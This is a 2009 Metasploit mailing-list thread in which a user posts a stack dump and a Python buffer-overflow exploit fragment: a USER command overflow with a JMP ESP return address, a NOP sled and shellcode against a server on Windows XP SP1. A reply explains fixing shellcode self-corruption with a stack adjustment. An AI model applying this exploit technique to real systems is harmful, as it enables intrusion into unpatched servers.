No room for shellcode

[egypt at metasploit.com (egypt at metasploit.com)]

It is possible that the shellcode is corrupting itself because ESP is
too close to EIP.  The first thing I would try is to prepend an
instruction like "add esp, -3500" to the shellcode.  In a regular
metasplot module this can be achieved by adding "'StackAdjustment' =>
-3500" in the Payload section of the info at the top.

Hope this helped,
egypt

On Sat, May 2, 2009 at 10:31 AM, DB Allen <allendb760 at googlemail.com> wrote:
> It's not a specific metasploit question - but I did use metasploit to
> generate the shellcode :-). I trying to write an exploit for a popular
> server based software but don't have room for the shellcode anywhere.
>
> Here is a copy of the stack (doing this on XP SP1. so no DEP):
>
> ************?? ***********? ********
> 00A4FD40?? 41414141? AAAA
> 00A4FD44?? 41414141? AAAA
> 00A4FD48?? 41414141? AAAA
> 00A4FD4C?? 41414141? AAAA
> 00A4FD50?? 41414141? AAAA
> 00A4FD54?? 77D718FC? ? ?w? USER32.77D718FC? -> JMP ESP
> 00A4FD58?? 90909090
> 00A4FD5C?? 90909090? ???-> ESP
> 00A4FD60?? 90909090
> 00A4FD64?? 90909090
> 00A4FD68?? 4DEB6AFC? ?j?M?? -> Shellcode start (should be 317 bytes)
> 00A4FD6C?? FFFFF9E8? ????
> 00A4FD70?? 6C8B60FF? ?`?l
> 00A4FD74?? 458B2424? $$?E
> 00A4FD78?? 057C8B3C? <?|
> 00A4FD7C?? 8BEF0178? x ??
> 00A4FD80?? 5F8B184F? O ?_
> 00A4FD84?? 49EB0120?? ?I
> 00A4FD88?? 018B348B? ?4?
> 00A4FD8C?? 99C031EE? ?1??
> 00A4FD90?? 74C084AC? ???t
> 00A4FD94?? 20CAC107? ???? ?-> Shellcode goes tits up.
> 00A4FD98?? 746E6320???xxxx??? -> Normal program code (obsfucated)
> 00A4FD9C?? 6C492072? xxxx
> 00A4FDA0?? 6167656C? xxxx
> 00A4FDA4?? 7375206C? xxxx
> 00A4FDA8?? 64697265??xxxx ? Pointer to next SEH record
> 00A4FDAC??6F4C202E??xxxx? SE handler
> 00A4FDB0?? 206E6967? xxxx
>
>
>
> The buffer is 480 bytes to cause the overflow.
>
> Here is the relevant bit of Python:
>
> #JMP ESP XP SP1
> jmp_sp1 = '\xfc\x18\xd7\x77'
> user = 'USER '
> buff = "A" * 480
> NOP = '\x90'
>
> s.connect(('192.168.2.4', XXXX))
> s.recv(1024)
> while 1:
> ??? s.send(user + buff + jmp_sp1 + NOP * 16 + shellcode + "\r\n")
>
> I'm thinking that I can include the shellcode as part of the buffer and find
> a static JMP?[ESP-xxx] in memory,?that could send the execution flow back
> into the buffer and to the shellcode.
>
> Is this a normal method to chose? Also is it reliable across OS's of the
> same service pack?
>
> If there is a better way, I'd love to hear it.
>
> Thanks,
>
> DB
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework